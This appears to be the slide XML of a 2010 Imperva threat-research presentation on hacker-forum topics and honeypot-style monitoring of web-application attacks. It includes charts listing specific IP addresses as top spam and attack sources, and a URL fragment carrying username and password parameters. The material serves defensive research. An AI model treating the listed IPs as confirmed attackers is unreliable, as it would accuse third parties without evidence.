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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId52"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="423" r:id="rId5"/>
    <p:sldId id="497" r:id="rId6"/>
    <p:sldId id="542" r:id="rId7"/>
    <p:sldId id="499" r:id="rId8"/>
    <p:sldId id="500" r:id="rId9"/>
    <p:sldId id="543" r:id="rId10"/>
    <p:sldId id="502" r:id="rId11"/>
    <p:sldId id="503" r:id="rId12"/>
    <p:sldId id="504" r:id="rId13"/>
    <p:sldId id="505" r:id="rId14"/>
    <p:sldId id="546" r:id="rId15"/>
    <p:sldId id="507" r:id="rId16"/>
    <p:sldId id="508" r:id="rId17"/>
    <p:sldId id="509" r:id="rId18"/>
    <p:sldId id="510" r:id="rId19"/>
    <p:sldId id="511" r:id="rId20"/>
    <p:sldId id="512" r:id="rId21"/>
    <p:sldId id="513" r:id="rId22"/>
    <p:sldId id="514" r:id="rId23"/>
    <p:sldId id="515" r:id="rId24"/>
    <p:sldId id="516" r:id="rId25"/>
    <p:sldId id="517" r:id="rId26"/>
    <p:sldId id="518" r:id="rId27"/>
    <p:sldId id="519" r:id="rId28"/>
    <p:sldId id="520" r:id="rId29"/>
    <p:sldId id="521" r:id="rId30"/>
    <p:sldId id="522" r:id="rId31"/>
    <p:sldId id="523" r:id="rId32"/>
    <p:sldId id="524" r:id="rId33"/>
    <p:sldId id="525" r:id="rId34"/>
    <p:sldId id="526" r:id="rId35"/>
    <p:sldId id="527" r:id="rId36"/>
    <p:sldId id="528" r:id="rId37"/>
    <p:sldId id="529" r:id="rId38"/>
    <p:sldId id="530" r:id="rId39"/>
    <p:sldId id="531" r:id="rId40"/>
    <p:sldId id="532" r:id="rId41"/>
    <p:sldId id="533" r:id="rId42"/>
    <p:sldId id="534" r:id="rId43"/>
    <p:sldId id="535" r:id="rId44"/>
    <p:sldId id="545" r:id="rId45"/>
    <p:sldId id="537" r:id="rId46"/>
    <p:sldId id="538" r:id="rId47"/>
    <p:sldId id="539" r:id="rId48"/>
    <p:sldId id="540" r:id="rId49"/>
    <p:sldId id="544" r:id="rId5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lnSpc>
        <a:spcPct val="105000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="500"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="C00000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:buChar char="§"/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1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="105000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="500"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="C00000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:buChar char="§"/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2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="105000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="500"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="C00000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:buChar char="§"/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3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="105000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="500"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="C00000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:buChar char="§"/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4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="105000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="500"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="C00000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:buChar char="§"/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Tahoma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006600"/>
    <a:srgbClr val="FFFADC"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="BDCED9"/>
    <a:srgbClr val="ABD3EB"/>
    <a:srgbClr val="660066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9" autoAdjust="0"/>
    <p:restoredTop sz="91047" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-6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752"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="-2826" y="-12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e-IL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Topic Breakdown</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="0"/>
            <c:explosion val="5"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:explosion val="5"/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Non-tech Related</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" dirty="0"/>
                      <a:t>
26%</a:t>
                    </a:r>
                  </a:p>
                </c:rich>
              </c:tx>
              <c:dLblPos val="outEnd"/>
              <c:showCatName val="1"/>
              <c:showPercent val="1"/>
              <c:separator>
</c:separator>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="0"/>
            <c:txPr>
              <a:bodyPr anchor="ctr" anchorCtr="1"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="1800" baseline="0"/>
                </a:pPr>
                <a:endParaRPr lang="he-IL"/>
              </a:p>
            </c:txPr>
            <c:dLblPos val="outEnd"/>
            <c:showCatName val="1"/>
            <c:showPercent val="1"/>
            <c:separator>
</c:separator>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>SQL Injection</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Misc.</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Passwords</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Credit Cards</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Spam &amp; Phishing</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Other Exploits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</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>44</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>35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he-I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e-IL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Exploits (Non SQL Injection)</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="1800" baseline="0"/>
                </a:pPr>
                <a:endParaRPr lang="he-IL"/>
              </a:p>
            </c:txPr>
            <c:dLblPos val="bestFit"/>
            <c:showCatName val="1"/>
            <c:showPercent val="1"/>
            <c:separator>
</c:separator>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$8</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>Anonymity Tools (vpn,proxy)</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Other</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>LFI / RFI</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Hacked Sites</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>XSS</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0 Day</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Shellcode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he-I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e-IL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Top 10 spam Sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(hits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> per source)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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 Spam Sources</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="8"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="3.7808641975308767E-4"/>
                  <c:y val="-5.8594465945994094E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showVal val="1"/>
              <c:separator>
</c:separator>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="9"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-2.0393518518518602E-2"/>
                  <c:y val="-0.27509030650829663"/>
                </c:manualLayout>
              </c:layout>
              <c:showVal val="1"/>
              <c:separator>
</c:separator>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="10"/>
              <c:showVal val="1"/>
              <c:showCatName val="1"/>
              <c:separator>
</c:separator>
            </c:dLbl>
            <c:showVal val="1"/>
            <c:separator>
</c:separator>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$12</c:f>
              <c:strCache>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>194.8.75.161</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>94.142.129.98</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>194.8.75.159</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>194.8.75.245</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>194.8.75.163</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>77.87.207.186</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>204.124.182.86</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>194.8.75.149</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>74.118.192.114</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>194.8.75.50</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Others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409</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>326</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>252</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>250</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>213</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>182</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>131</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>70</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>51</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>811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he-IL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e-IL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Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(hits per source)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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 Attack Source</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dPt>
            <c:idx val="10"/>
            <c:explosion val="2"/>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="10"/>
              <c:dLblPos val="outEnd"/>
              <c:showVal val="1"/>
              <c:showCatName val="1"/>
              <c:separator>
</c:separator>
            </c:dLbl>
            <c:dLblPos val="outEnd"/>
            <c:showVal val="1"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$12</c:f>
              <c:strCache>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>125.160.17.200</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>211.223.205.250</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>69.36.2.101</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>121.78.118.94</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>213.198.4.237</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>91.121.175.13</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>121.101.214.54</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>204.238.82.18</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>82.165.193.182</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>203.130.149.241</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Others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99</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>26</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>738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he-I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B0F1904-59B1-44F8-B347-2CABB7041673}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9/5/2010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2AFDD4F-7E07-4672-A8C0-ABB4DCDF7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A9A79C5-0C4B-4A76-882E-A3C5A9733999}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9/5/2010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5248694-8C0D-47DA-8DB1-22DD827AC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A841B-EB3A-4320-9EFC-05CA8511356E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D2851-FA2B-47CC-91E5-18A8911D6EA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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5" descr="imperva_logo_whi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590800"/>
            <a:ext cx="3124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57601"/>
            <a:ext cx="7772400" cy="9906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46112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900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CONFIDENTIAL - Imperva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8" descr="Imperva_TemplateCoverPage.tif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 userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1981200"/>
              <a:ext cx="9144000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-11113" y="0"/>
            <a:ext cx="9144001" cy="68580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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 5" descr="imperva_logo_whi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5925" y="6492875"/>
            <a:ext cx="1914525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895600"/>
            <a:ext cx="7772400" cy="774700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1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10000"/>
            <a:ext cx="7772400" cy="59690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1132"/>
            <a:ext cx="7391400" cy="766916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="0" bIns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340475"/>
            <a:ext cx="762000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B1A2FCCD-E097-43DE-B5C2-FC10EEC7DF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4592"/>
            <a:ext cx="7467600" cy="76691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191000" y="6340475"/>
            <a:ext cx="762000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B1A2FCCD-E097-43DE-B5C2-FC10EEC7DF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6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Heading Tahoma 32 pt, White</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027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Subheading Tahoma 24 pt, Black</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Top Level Bullet Tahoma 20 pt, Black</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Second level bullet Tahoma 16 pt, black</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Third level bullet Tahoma 14 pt, black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1" r:id="rId3"/>
    <p:sldLayoutId id="2147483942" r:id="rId4"/>
  </p:sldLayoutIdLst>
  <p:transition spd="med"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  <a:cs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  <a:cs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  <a:cs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Myriad Pro SemiEx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Myriad Pro SemiEx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Myriad Pro SemiEx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Myriad Pro SemiExt" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="225425" indent="-225425" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="500"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="C000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231775" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="500"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="C00000"/>
        </a:buClr>
        <a:buSzPct val="11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500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="500"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="C00000"/>
        </a:buClr>
        <a:buSzPct val="11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500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="500"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="C00000"/>
        </a:buClr>
        <a:buSzPct val="115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500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="500"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="C00000"/>
        </a:buClr>
        <a:buSzPct val="115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omehost/config/isp_verify_user?l=%5busername%5d&amp;p=%5bpasswor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gelfire.com/zine2/oo0_elit3_0oo/page3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cketmaster.com/event/010042A16D244B73?artistid=805980&amp;majorcatid=10004&amp;minorcatid=8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 idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="3429000"/>
            <a:ext cx="8229600" cy="990600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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker Intelligence:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 6 Months of Attack Vector Research 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66750" y="5233988"/>
            <a:ext cx="8067675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5425" indent="-225425" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="500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Tal Be’ery, ADC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="225425" indent="-225425" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="500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Imperva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0926" y="5000626"/>
            <a:ext cx="1233488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Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="981075" y="1295400"/>
            <a:ext cx="7248525" cy="1343025"/>
            <a:chOff x="2014755" y="1144875"/>
            <a:chExt cx="7248525" cy="1343025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Picture 21" descr="ltBlue_bar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4755" y="1144875"/>
              <a:ext cx="7248525" cy="13430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439263" y="1524000"/>
              <a:ext cx="63995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Motivation &amp; Problem Definition</a:t>
              </a:r>
              <a:endPara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981075" y="2447300"/>
            <a:ext cx="7248525" cy="1343025"/>
            <a:chOff x="981075" y="2362200"/>
            <a:chExt cx="7248525" cy="1343025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 22" descr="ltBlue_bar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075" y="2362200"/>
              <a:ext cx="7248525" cy="1343025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3982410" y="2741325"/>
              <a:ext cx="12458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Tools</a:t>
              </a:r>
              <a:endPara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981075" y="3599200"/>
            <a:ext cx="7248525" cy="1343025"/>
            <a:chOff x="981075" y="3429000"/>
            <a:chExt cx="7248525" cy="1343025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24" descr="ltBlue_bar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1075" y="3429000"/>
              <a:ext cx="7248525" cy="1343025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177318" y="3808125"/>
              <a:ext cx="2856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Data Analysis</a:t>
              </a:r>
              <a:endPara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981075" y="4751100"/>
            <a:ext cx="7248525" cy="1343025"/>
            <a:chOff x="1272051" y="4419600"/>
            <a:chExt cx="7248525" cy="1343025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Picture 26" descr="ltBlue_bar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2051" y="4419600"/>
              <a:ext cx="7248525" cy="1343025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2109845" y="4798725"/>
              <a:ext cx="55729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Future Work &amp; Conclusions</a:t>
              </a:r>
              <a:endPara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atin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Motivation</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why track hackers? Is it difficult?</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL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Live In a dangerous world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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Industrialized Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Roles, Optimization &amp; Automation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack techniques &amp; vectors keep evolving at a rapid pace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack tools and platforms keep evolving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sophisticated automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proliferation of botnets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trojans, etc.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8066" name="Picture 2" descr="http://www.spectroinc.com/Collateral/Images/English-US/manufactur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219200"/>
            <a:ext cx="3204174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Enemy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276599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Eliminate uncertainties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active attack sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Explicit attack vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focus on actual threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Devise new defenses based on real data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reduce guess work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If you know the enemy and know yourself, you need not fear the result of a hundred battles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/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Sun Tzu – The Art of War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6018" name="Picture 2" descr="http://doctorzhivago.files.wordpress.com/2008/01/231-foc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743200"/>
            <a:ext cx="2666999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>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:latin typeface="Trebuchet MS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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How do we do it?</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>created a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“hack-o-scope”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553200" cy="4495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Threat centers are an established practice for AV companies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collect potential threat vectors and detection data from actual deployments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> projects of various types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Workstations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network layer attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam and Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Web application attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hard to create a compelling decoy application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enterprise customers are not inclined to share attack data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Governments simply won’t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1922" name="Picture 2" descr="http://upload.wikimedia.org/wikipedia/en/3/35/4x_rifle_sco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438400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Tap into actual application traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single out attacks</a:t>
            </a:r>
          </a:p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Real target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PoV</a:t>
            </a:r>
